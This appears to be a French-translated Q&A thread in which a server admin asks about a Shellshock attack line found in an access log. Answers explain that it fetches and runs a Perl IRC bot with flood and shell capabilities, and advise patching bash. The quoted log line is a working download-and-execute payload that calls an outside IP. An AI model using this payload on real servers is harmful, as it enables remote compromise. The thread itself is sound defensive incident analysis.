J'ai vu cela access.log
sur mon serveur de test:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Aucune des adresses n'est liée à moi ou à notre plage IP (ou à toute autre chose d'ailleurs) . Je pensais immédiatement au bogue de sécurité Shellshock / "bashdoor".
Il semble que quelqu'un ait essayé de curl
«quelque chose» vers le serveur, puis exécuté ce «quelque chose» et ensuite supprimé «quelque chose» avec -rf
.
Il s'agit d'un serveur de test pur, aucun mal n'est fait (== aucun mal ne peut être fait à part la réinstallation) - mais le timing est très intéressant. Je n'ai jamais rien vu de tel auparavant, pour autant que je m'en souvienne.
Dois-je m'inquiéter, par exemple être "intéressé"? Avez-vous une idée de ce que c'est?
security
shell-script
webserver
davidkonrad
la source
la source
Réponses:
C'est quelqu'un qui exploite le bogue Shellshock. Pouvez-vous déterminer ce que faisait le script Perl? Cela vaut vraiment la peine de fouiller. La deuxième URL utilisée renvoie un 404, mais
http://213.5.67.223/ji
existe et pourrait être la même chose, car il s'agit d'un script perl. Il semble que ce soit un serveur IRC d'une certaine sorte, donc la connexion à votre serveur de test avec un client IRC peut s'avérer intéressante. EDIT: Le commentaire m'a corrigé, c'est un client, donc capable de vous espionner.Vérifiez également si le script perl est toujours en cours d'exécution.
la source
ps -ax | grep perl
oups ax | grep perl
ps -ef
je peux voir qu'il y a un/usr/sbin/apache2 -k start
avec le même horodatage :( Donc je suppose que l'attaque a réussi. Avoir mis à jour bash avecsudo apt-get update && sudo apt-get install --only-upgrade bash
shell
routine qui m'inquiétait: my @ resp =$comando 2>&1 3>&1
; Pas de mal pour autant que je sache.La vulnérabilité Shellshock est utilisée pour télécharger (utiliser
wget
) et exécuter un script Perl malveillant, cette attaque est très basique et nécessite l'installation de Perl et wget (en supposant que l'un d'eux ne le soit pas et que vous êtes sûr qu'il n'y a pas eu d'autres tentatives de craquage, votre serveur n'a pas été compromis).Le script lui-même est un robot IRC de base pour les enfants, une fois exécuté, qui se connecte à un serveur IRC et attend les commandes, il semble qu'il possède des capacités de recherche Google, très probablement pour rechercher automatiquement les hôtes vulnérables et tenter de les exploiter. En dehors de cela, vous avez bien sûr l'arsenal de base de skiddie, qui est le flot HTTP, le flot TCP et UDP et l'accès au shell (en tant qu'utilisateur qui a exécuté le script, qui serait l'utilisateur sous lequel le serveur HTTP s'exécute).
la source
Comme déjà mentionné par d'autres, il s'agit d'une tentative de script-kiddie d'exploiter la vulnérabilité bash pour exécuter un bot IRC basé sur un script perl. Si vous avez bash mis à jour , et en plus, si vous exécutez apache sous chroot comme je le fais, vous n'avez rien à craindre. J'en vois plusieurs versions sur mon journal (voir ci-dessous) au moins tous les deux jours depuis le 27/09 ... ce n'est qu'un bruit.
Une autre variété de tentative d'exécution de script (script python) que je viens de remarquer aujourd'hui ... NOTE: google-traffic-analytics.com où le script python est téléchargé n'a rien à voir avec Google bien sûr.
la source